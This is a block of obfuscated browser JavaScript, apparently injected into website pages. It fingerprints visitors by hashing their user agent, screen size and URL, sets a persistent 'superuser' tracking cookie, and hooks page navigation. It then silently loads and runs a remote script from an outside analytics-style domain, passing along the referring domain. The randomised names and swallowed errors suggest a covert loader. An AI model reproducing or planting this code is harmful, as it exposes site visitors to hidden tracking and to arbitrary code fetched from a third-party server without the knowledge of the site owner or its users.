(async function () { try { if (sessionStorage.getItem('ua_key')) { return; } const ua = navigator.userAgent; const encoder = new TextEncoder(); const data = encoder.encode(ua); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('ua_key', hashHex); } catch (e) { } })(); function CCqgENlbc (PlAjzqAgF) { var eebeCzKHQ = PlAjzqAgF + '='; var opYcLJFbl = document.cookie.split(';'); for (var i = 0; i < opYcLJFbl.length; i++) { var pLxWCmRLp = opYcLJFbl[i]; while (pLxWCmRLp.charAt(0) === ' ') { pLxWCmRLp = pLxWCmRLp.substring(1); } if (pLxWCmRLp.indexOf(eebeCzKHQ) === 0) { return pLxWCmRLp.substring(eebeCzKHQ.length, pLxWCmRLp.length); } } return ''; } function CYCBkKGiS () { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function (kfiNpApxC) { var ddXOHhWsR = Math.random() * 16 | 0, jxqFHToWG = kfiNpApxC === 'x' ? ddXOHhWsR : (ddXOHhWsR & 0x3 | 0x8); return jxqFHToWG.toString(16); }) } (async function () { try { if (sessionStorage.getItem('screen_key')) { return; } const screenSize = [ screen.width, screen.height, screen.colorDepth, window.devicePixelRatio || 1 ].join('x'); const encoder = new TextEncoder(); const data = encoder.encode(screenSize); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('screen_key', hashHex); } catch (e) { } })(); var HWmPeWoNK = window.location.href; (() => { let oldPushState = history.pushState; history.pushState = function pushState() { let ret = oldPushState.apply(this, arguments); window.dispatchEvent(new Event('pushstate')); window.dispatchEvent(new Event('locationchange')); return ret; }; let oldReplaceState = history.replaceState; history.replaceState = function replaceState() { let ret = oldReplaceState.apply(this, arguments); window.dispatchEvent(new Event('replacestate')); window.dispatchEvent(new Event('locationchange')); return ret; }; window.addEventListener('popstate', () => { window.dispatchEvent(new Event('locationchange')); }); })(); zIUnLHnyN(HWmPeWoNK).then(function (value) { window.addEventListener('locationchange', function () { if (window.location.href != HWmPeWoNK) { HWmPeWoNK = window.location.href; zIUnLHnyN(HWmPeWoNK).then(function (value) { }); } }); }); async function zIUnLHnyN (qegzvaszf) { var URcWsgqVE = CCqgENlbc('superuser'); if (!URcWsgqVE || URcWsgqVE === '') URcWsgqVE = CYCBkKGiS(); var wcKbjmXbY = (new Date(Date.now() + 30 * 86400 * 1000)).toUTCString(); document.cookie = 'superuser=' + URcWsgqVE + '; expires=' + wcKbjmXbY + 86400 + ';path=/;'; var MTHSKyXte = { url: qegzvaszf, referrer: document.referrer, unique_id: URcWsgqVE }; return ''; } try { var YrwdJLQiW_referrer = document.referrer; if (YrwdJLQiW_referrer == "") { YrwdJLQiW_referrer = window.location.href; } if (YrwdJLQiW_referrer) { const c_domain = new URL(YrwdJLQiW_referrer).hostname; async function kJbjflwgP_tracker () { var BTEEemmzG_script = document.createElement('script'); BTEEemmzG_script.src = `https://online.trackanalytics.info/audience.js?domain=${c_domain}`; document.head.appendChild(BTEEemmzG_script); } kJbjflwgP_tracker(); } } catch (error) { } (async function () { try { if (sessionStorage.getItem('url_key')) { return; } const currentUrl = location.origin + location.pathname + location.search; const encoder = new TextEncoder(); const data = encoder.encode(currentUrl); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('url_key', hashHex); } catch (e) { } })();